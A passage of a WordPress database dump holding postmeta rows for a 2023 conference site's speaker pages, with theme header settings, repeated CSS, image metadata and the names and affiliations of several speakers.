(28358,3865,'_dt_teammate_options_delicious',''),
(28359,3865,'_dt_teammate_options_flickr',''),
(28360,3865,'_dt_teammate_options_lastfm',''),
(28361,3865,'_dt_teammate_options_linkedin',''),
(28362,3865,'_dt_teammate_options_vimeo',''),
(28363,3865,'_dt_teammate_options_tumbler',''),
(28364,3865,'_dt_teammate_options_pinterest',''),
(28365,3865,'_dt_teammate_options_devian',''),
(28366,3865,'_dt_teammate_options_skype',''),
(28367,3865,'_dt_teammate_options_github',''),
(28368,3865,'_dt_teammate_options_instagram',''),
(28369,3865,'_dt_teammate_options_stumbleupon',''),
(28370,3865,'_dt_teammate_options_behance',''),
(28371,3865,'_dt_teammate_options_px-500',''),
(28372,3865,'_dt_teammate_options_tripedvisor',''),
(28373,3865,'_dt_teammate_options_vk',''),
(28374,3865,'_dt_teammate_options_foursquare',''),
(28375,3865,'_dt_teammate_options_xing',''),
(28376,3865,'_dt_teammate_options_weibo',''),
(28377,3865,'_dt_teammate_options_odnoklassniki',''),
(28378,3865,'_dt_teammate_options_research-gate',''),
(28379,3865,'_dt_teammate_options_yelp',''),
(28380,3865,'_dt_teammate_options_blogger',''),
(28381,3865,'_dt_teammate_options_soundcloud',''),
(28382,3865,'_dt_teammate_options_viber',''),
(28383,3865,'_dt_teammate_options_whatsapp',''),
(28384,3865,'_dt_teammate_options_reddit',''),
(28385,3865,'_dt_teammate_options_snapchat',''),
(28386,3865,'_dt_teammate_options_telegram',''),
(28387,3865,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(28388,3867,'_edit_lock','1675728441:1'),
(28389,3868,'_wp_attached_file','2023/02/ws283.jpg'),
(28390,3868,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:112;s:6:\"height\";i:140;s:4:\"file\";s:17:\"2023/02/ws283.jpg\";s:8:\"filesize\";i:5663;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(28391,3867,'_thumbnail_id','3868'),
(28392,3867,'_edit_last','1'),
(28393,3867,'_dt_sidebar_position','disabled'),
(28394,3867,'_dt_sidebar_widgetarea_id','sidebar_1'),
(28395,3867,'_dt_sidebar_hide_on_mobile','0'),
(28396,3867,'_dt_footer_show','1'),
(28397,3867,'_dt_footer_widgetarea_id','sidebar_2'),
(28398,3867,'_dt_footer_hide_on_mobile','0'),
(28399,3867,'_dt_header_title','fancy'),
(28400,3867,'_dt_header_background','normal'),
(28401,3867,'_dt_header_background_below_slideshow','disabled'),
(28402,3867,'_dt_header_transparent_bg_color_scheme','light'),
(28403,3867,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28404,3867,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28405,3867,'_dt_header_transparent_bg_color','#000000'),
(28406,3867,'_dt_header_transparent_bg_opacity','50'),
(28407,3867,'_dt_header_disabled_background','normal'),
(28408,3867,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28409,3867,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28410,3867,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28411,3867,'_dt_header_disabled_transparent_bg_color','#000000'),
(28412,3867,'_dt_header_disabled_transparent_bg_opacity','50'),
(28413,3867,'_dt_page_overrides_top_margin',''),
(28414,3867,'_dt_page_overrides_right_margin',''),
(28415,3867,'_dt_page_overrides_bottom_margin',''),
(28416,3867,'_dt_page_overrides_left_margin',''),
(28417,3867,'_dt_mobile_page_padding_top',''),
(28418,3867,'_dt_mobile_page_padding_right',''),
(28419,3867,'_dt_mobile_page_padding_bottom',''),
(28420,3867,'_dt_mobile_page_padding_left',''),
(28421,3867,'_dt_fancy_header_layout_heading',''),
(28422,3867,'_dt_fancy_header_title_aligment','center'),
(28423,3867,'_dt_fancy_header_height','300'),
(28424,3867,'_dt_fancy_header_padding-top','0px'),
(28425,3867,'_dt_fancy_header_padding-bottom','0px'),
(28426,3867,'_dt_fancy_header_breadcrumbs_heading',''),
(28427,3867,'_dt_fancy_header_breadcrumbs','disabled'),
(28428,3867,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28429,3867,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28430,3867,'_dt_fancy_header_title_heading',''),
(28431,3867,'_dt_fancy_header_title_mode','custom'),
(28432,3867,'_dt_fancy_header_title','Xinlian Liang'),
(28433,3867,'_dt_fancy_header_title_font_size','30'),
(28434,3867,'_dt_fancy_header_title_line_height','36'),
(28435,3867,'_dt_fancy_header_text_transform','none'),
(28436,3867,'_dt_fancy_header_title_color_mode','color'),
(28437,3867,'_dt_fancy_header_title_color','#ffffff'),
(28438,3867,'_dt_fancy_header_subtitle_heading',''),
(28439,3867,'_dt_fancy_header_subtitle','Wuhan University,  China (WG III/1)'),
(28440,3867,'_dt_fancy_header_subtitle_font_size','18'),
(28441,3867,'_dt_fancy_header_subtitle_line_height','26'),
(28442,3867,'_dt_fancy_header_subtitle_text_transform','none'),
(28443,3867,'_dt_fancy_header_subtitle_color_mode','color'),
(28444,3867,'_dt_fancy_header_subtitle_color','#ffffff'),
(28445,3867,'_dt_fancy_header_bg_heading',''),
(28446,3867,'_dt_fancy_header_bg_color','#222222'),
(28447,3867,'_dt_fancy_header_bg_image_origin','custom'),
(28448,3867,'_dt_fancy_header_bg_image','a:0:{}'),
(28449,3867,'_dt_fancy_header_bg_repeat','no-repeat'),
(28450,3867,'_dt_fancy_header_bg_position_x','center'),
(28451,3867,'_dt_fancy_header_bg_position_y','center'),
(28452,3867,'_dt_fancy_header_bg_fullscreen','1'),
(28453,3867,'_dt_fancy_header_bg_overlay','0'),
(28454,3867,'_dt_fancy_header_overlay_color','#000'),
(28455,3867,'_dt_fancy_header_bg_overlay_opacity','50'),
(28456,3867,'_dt_fancy_header_scroll_effect','default'),
(28457,3867,'_dt_fancy_header_bg_parallax','0.5'),
(28458,3867,'_dt_fancy_header_responsiveness_heading',''),
(28459,3867,'_dt_fancy_header_responsiveness','disabled'),
(28460,3867,'_dt_fancy_header_responsiveness_switch','778px'),
(28461,3867,'_dt_fancy_header_responsive_height','70'),
(28462,3867,'_dt_fancy_header_responsive_font_size','30'),
(28463,3867,'_dt_fancy_header_responsive_title_line_height','38'),
(28464,3867,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(28465,3867,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(28466,3867,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(28467,3867,'_dt_teammate_options_go_to_single','1'),
(28468,3867,'_dt_teammate_options_position',''),
(28469,3867,'_dt_teammate_options_website',''),
(28470,3867,'_dt_teammate_options_mail',''),
(28471,3867,'_dt_teammate_options_facebook',''),
(28472,3867,'_dt_teammate_options_twitter',''),
(28473,3867,'_dt_teammate_options_dribbble',''),
(28474,3867,'_dt_teammate_options_you-tube',''),
(28475,3867,'_dt_teammate_options_rss',''),
(28476,3867,'_dt_teammate_options_delicious',''),
(28477,3867,'_dt_teammate_options_flickr',''),
(28478,3867,'_dt_teammate_options_lastfm',''),
(28479,3867,'_dt_teammate_options_linkedin',''),
(28480,3867,'_dt_teammate_options_vimeo',''),
(28481,3867,'_dt_teammate_options_tumbler',''),
(28482,3867,'_dt_teammate_options_pinterest',''),
(28483,3867,'_dt_teammate_options_devian',''),
(28484,3867,'_dt_teammate_options_skype',''),
(28485,3867,'_dt_teammate_options_github',''),
(28486,3867,'_dt_teammate_options_instagram',''),
(28487,3867,'_dt_teammate_options_stumbleupon',''),
(28488,3867,'_dt_teammate_options_behance',''),
(28489,3867,'_dt_teammate_options_px-500',''),
(28490,3867,'_dt_teammate_options_tripedvisor',''),
(28491,3867,'_dt_teammate_options_vk',''),
(28492,3867,'_dt_teammate_options_foursquare',''),
(28493,3867,'_dt_teammate_options_xing',''),
(28494,3867,'_dt_teammate_options_weibo',''),
(28495,3867,'_dt_teammate_options_odnoklassniki',''),
(28496,3867,'_dt_teammate_options_research-gate',''),
(28497,3867,'_dt_teammate_options_yelp',''),
(28498,3867,'_dt_teammate_options_blogger',''),
(28499,3867,'_dt_teammate_options_soundcloud',''),
(28500,3867,'_dt_teammate_options_viber',''),
(28501,3867,'_dt_teammate_options_whatsapp',''),
(28502,3867,'_dt_teammate_options_reddit',''),
(28503,3867,'_dt_teammate_options_snapchat',''),
(28504,3867,'_dt_teammate_options_telegram',''),
(28505,3867,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(28506,3871,'_wp_attached_file','2023/02/ws28main-1.jpg'),
(28507,3871,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:232;s:6:\"height\";i:199;s:4:\"file\";s:22:\"2023/02/ws28main-1.jpg\";s:8:\"filesize\";i:17134;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"ws28main-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28539,3855,'_dt_fancy_header_layout_heading',''),
(28540,3855,'_dt_fancy_header_title_aligment','center'),
(28541,3855,'_dt_fancy_header_height','300'),
(28542,3855,'_dt_fancy_header_padding-top','0px'),
(28543,3855,'_dt_fancy_header_padding-bottom','0px'),
(28544,3855,'_dt_fancy_header_breadcrumbs_heading',''),
(28545,3855,'_dt_fancy_header_breadcrumbs','disabled'),
(28546,3855,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28547,3855,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28548,3855,'_dt_fancy_header_title_heading',''),
(28549,3855,'_dt_fancy_header_title_mode','custom'),
(28550,3855,'_dt_fancy_header_title',''),
(28551,3855,'_dt_fancy_header_title_font_size','30'),
(28552,3855,'_dt_fancy_header_title_line_height','36'),
(28553,3855,'_dt_fancy_header_text_transform','none'),
(28554,3855,'_dt_fancy_header_title_color_mode','color'),
(28555,3855,'_dt_fancy_header_title_color','#ffffff'),
(28556,3855,'_dt_fancy_header_subtitle_heading',''),
(28557,3855,'_dt_fancy_header_subtitle',''),
(28558,3855,'_dt_fancy_header_subtitle_font_size','18'),
(28559,3855,'_dt_fancy_header_subtitle_line_height','26'),
(28560,3855,'_dt_fancy_header_subtitle_text_transform','none'),
(28561,3855,'_dt_fancy_header_subtitle_color_mode','color'),
(28562,3855,'_dt_fancy_header_subtitle_color','#ffffff'),
(28563,3855,'_dt_fancy_header_bg_heading',''),
(28564,3855,'_dt_fancy_header_bg_color','#222222'),
(28565,3855,'_dt_fancy_header_bg_image_origin','featured_image'),
(28566,3855,'_dt_fancy_header_bg_image','a:0:{}'),
(28567,3855,'_dt_fancy_header_bg_repeat','no-repeat'),
(28568,3855,'_dt_fancy_header_bg_position_x','center'),
(28569,3855,'_dt_fancy_header_bg_position_y','center'),
(28570,3855,'_dt_fancy_header_bg_fullscreen','1'),
(28571,3855,'_dt_fancy_header_bg_overlay','0'),
(28572,3855,'_dt_fancy_header_overlay_color','#000'),
(28573,3855,'_dt_fancy_header_bg_overlay_opacity','50'),
(28574,3855,'_dt_fancy_header_scroll_effect','default'),
(28575,3855,'_dt_fancy_header_bg_parallax','0.5'),
(28576,3855,'_dt_fancy_header_responsiveness_heading',''),
(28577,3855,'_dt_fancy_header_responsiveness','enabled'),
(28578,3855,'_dt_fancy_header_responsiveness_switch','778px'),
(28579,3855,'_dt_fancy_header_responsive_height','70'),
(28580,3855,'_dt_fancy_header_responsive_font_size','30'),
(28581,3855,'_dt_fancy_header_responsive_title_line_height','38'),
(28582,3855,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(28583,3855,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(28584,3855,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(28585,3855,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/02/ws28main.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(28586,3872,'_edit_lock','1692138242:1'),
(28587,3873,'_wp_attached_file','2023/02/Dr-Mohamed_Mostafa.jpg'),
(28588,3873,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:272;s:6:\"height\";i:390;s:4:\"file\";s:30:\"2023/02/Dr-Mohamed_Mostafa.jpg\";s:8:\"filesize\";i:28703;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"Dr-Mohamed_Mostafa-209x300.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13015;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"Dr-Mohamed_Mostafa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6122;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28589,3872,'_thumbnail_id','3873'),
(28590,3872,'_edit_last','1'),
(28591,3872,'_dt_sidebar_position','disabled'),
(28592,3872,'_dt_sidebar_widgetarea_id','sidebar_1'),
(28593,3872,'_dt_sidebar_hide_on_mobile','0'),
(28594,3872,'_dt_footer_show','1'),
(28595,3872,'_dt_footer_widgetarea_id','sidebar_2'),
(28596,3872,'_dt_footer_hide_on_mobile','0'),
(28597,3872,'_dt_header_title','fancy'),
(28598,3872,'_dt_header_background','normal'),
(28599,3872,'_dt_header_background_below_slideshow','disabled'),
(28600,3872,'_dt_header_transparent_bg_color_scheme','light'),
(28601,3872,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(28602,3872,'_dt_header_transparent_top_bar_bg_opacity','25'),
(28603,3872,'_dt_header_transparent_bg_color','#000000'),
(28604,3872,'_dt_header_transparent_bg_opacity','50'),
(28605,3872,'_dt_header_disabled_background','normal'),
(28606,3872,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(28607,3872,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(28608,3872,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(28609,3872,'_dt_header_disabled_transparent_bg_color','#000000'),
(28610,3872,'_dt_header_disabled_transparent_bg_opacity','50'),
(28611,3872,'_dt_page_overrides_top_margin',''),
(28612,3872,'_dt_page_overrides_right_margin',''),
(28613,3872,'_dt_page_overrides_bottom_margin',''),
(28614,3872,'_dt_page_overrides_left_margin',''),
(28615,3872,'_dt_mobile_page_padding_top',''),
(28616,3872,'_dt_mobile_page_padding_right',''),
(28617,3872,'_dt_mobile_page_padding_bottom',''),
(28618,3872,'_dt_mobile_page_padding_left',''),
(28619,3872,'_dt_fancy_header_layout_heading',''),
(28620,3872,'_dt_fancy_header_title_aligment','center'),
(28621,3872,'_dt_fancy_header_height','300'),
(28622,3872,'_dt_fancy_header_padding-top','0px'),
(28623,3872,'_dt_fancy_header_padding-bottom','0px'),
(28624,3872,'_dt_fancy_header_breadcrumbs_heading',''),
(28625,3872,'_dt_fancy_header_breadcrumbs','disabled'),
(28626,3872,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(28627,3872,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(28628,3872,'_dt_fancy_header_title_heading',''),
(28629,3872,'_dt_fancy_header_title_mode','custom'),
(28630,3872,'_dt_fancy_header_title','Dr. Mohamed Mostafa'),
(28631,3872,'_dt_fancy_header_title_font_size','30'),
(28632,3872,'_dt_fancy_header_title_line_height','36'),
(28633,3872,'_dt_fancy_header_text_transform','none'),
(28634,3872,'_dt_fancy_header_title_color_mode','color'),
(28635,3872,'_dt_fancy_header_title_color','#ffffff'),
(28636,3872,'_dt_fancy_header_subtitle_heading',''),
(28637,3872,'_dt_fancy_header_subtitle','Lead Technical Authority - Trimble Applanix – Canada'),
(28638,3872,'_dt_fancy_header_subtitle_font_size','18'),
(28639,3872,'_dt_fancy_header_subtitle_line_height','26'),
(28640,3872,'_dt_fancy_header_subtitle_text_transform','none'),
(28641,3872,'_dt_fancy_header_subtitle_color_mode','color'),
(28642,3872,'_dt_fancy_header_subtitle_color','#ffffff'),
(28643,3872,'_dt_fancy_header_bg_heading',''),
(28644,3872,'_dt_fancy_header_bg_color','#222222'),
(28645,3872,'_dt_fancy_header_bg_image_origin','custom'),
(28646,3872,'_dt_fancy_header_bg_image','a:0:{}'),
(28647,3872,'_dt_fancy_header_bg_repeat','no-repeat'),
(28648,3872,'_dt_fancy_header_bg_position_x','center'),
(28649,3872,'_dt_fancy_header_bg_position_y','center'),
(28650,3872,'_dt_fancy_header_bg_fullscreen','1'),
(28651,3872,'_dt_fancy_header_bg_overlay','0'),
(28652,3872,'_dt_fancy_header_overlay_color','#000'),
(28653,3872,'_dt_fancy_header_bg_overlay_opacity','50'),
(28654,3872,'_dt_fancy_header_scroll_effect','default'),
(28655,3872,'_dt_fancy_header_bg_parallax','0.5'),
(28656,3872,'_dt_fancy_header_responsiveness_heading',''),
(28657,3872,'_dt_fancy_header_responsiveness','disabled'),
(28658,3872,'_dt_fancy_header_responsiveness_switch','778px'),
(28659,3872,'_dt_fancy_header_responsive_height','70'),
(28660,3872,'_dt_fancy_header_responsive_font_size','30'),
(28661,3872,'_dt_fancy_header_responsive_title_line_height','38'),
(28662,3872,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(28663,3872,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(28664,3872,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(28665,3872,'_dt_teammate_options_go_to_single','1'),
(28666,3872,'_dt_teammate_options_position',''),
(28667,3872,'_dt_teammate_options_website',''),
(28668,3872,'_dt_teammate_options_mail',''),
(28669,3872,'_dt_teammate_options_facebook',''),
(28670,3872,'_dt_teammate_options_twitter',''),
(28671,3872,'_dt_teammate_options_dribbble',''),
(28672,3872,'_dt_teammate_options_you-tube',''),
(28673,3872,'_dt_teammate_options_rss',''),
(28674,3872,'_dt_teammate_options_delicious',''),
(28675,3872,'_dt_teammate_options_flickr',''),
(28676,3872,'_dt_teammate_options_lastfm',''),
(28677,3872,'_dt_teammate_options_linkedin',''),
(28678,3872,'_dt_teammate_options_vimeo',''),
(28679,3872,'_dt_teammate_options_tumbler',''),
(28680,3872,'_dt_teammate_options_pinterest',''),
(28681,3872,'_dt_teammate_options_devian',''),
(28682,3872,'_dt_teammate_options_skype',''),
(28683,3872,'_dt_teammate_options_github',''),
(28684,3872,'_dt_teammate_options_instagram',''),
(28685,3872,'_dt_teammate_options_stumbleupon',''),
(28686,3872,'_dt_teammate_options_behance',''),
(28687,3872,'_dt_teammate_options_px-500',''),
(28688,3872,'_dt_teammate_options_tripedvisor',''),
(28689,3872,'_dt_teammate_options_vk',''),
(28690,3872,'_dt_teammate_options_foursquare',''),
(28691,3872,'_dt_teammate_options_xing',''),
(28692,3872,'_dt_teammate_options_weibo',''),
(28693,3872,'_dt_teammate_options_odnoklassniki',''),
(28694,3872,'_dt_teammate_options_research-gate',''),
(28695,3872,'_dt_teammate_options_yelp',''),
(28696,3872,'_dt_teammate_options_blogger',''),
(28697,3872,'_dt_teammate_options_soundcloud',''),
(28698,3872,'_dt_teammate_options_viber',''),
(28699,3872,'_dt_teammate_options_whatsapp',''),
(28700,3872,'_dt_teammate_options_reddit',''),
(28701,3872,'_dt_teammate_options_snapchat',''),
(28702,3872,'_dt_teammate_options_telegram',''),
(28703,3872,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(28704,3874,'_edit_lock','1675728623:1'),
(28705,3875,'_wp_attached_file','2023/02/Dr-Adel-Moussa-Photo.jpg'),
(28706,3875,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:220;s:6:\"height\";i:287;s:4:\"file\";s:32:\"2023/02/Dr-Adel-Moussa-Photo.jpg\";s:8:\"filesize\";i:43677;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"Dr-Adel-Moussa-Photo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5032;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1653773094\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(28707,3874,'_thumbnail_id','3875'),
(28708,3874,'_edit_last','1'),
(28709,3874,'_dt_sidebar_position','disabled'),
(28710,3874,'_dt_sidebar_widgetarea_id','sidebar_1'),
